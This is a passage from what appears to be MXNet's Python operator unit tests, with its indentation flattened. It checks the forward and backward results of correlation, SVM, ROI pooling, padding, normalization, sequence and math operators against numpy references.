exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'].asnumpy(), grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'].asnumpy(), grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad.asnumpy())
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0].asnumpy())
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad.asnumpy())
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0].asnumpy()
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0] / s[1], axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size / s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype is 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([4,5,6], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
arr_grad1 = arr_grad1.asnumpy()
arr_grad2 = arr_grad2.asnumpy()
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
arr_grad = arr_grad.asnumpy()
# print(name)
# print(arr_grad)
# print(npout_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
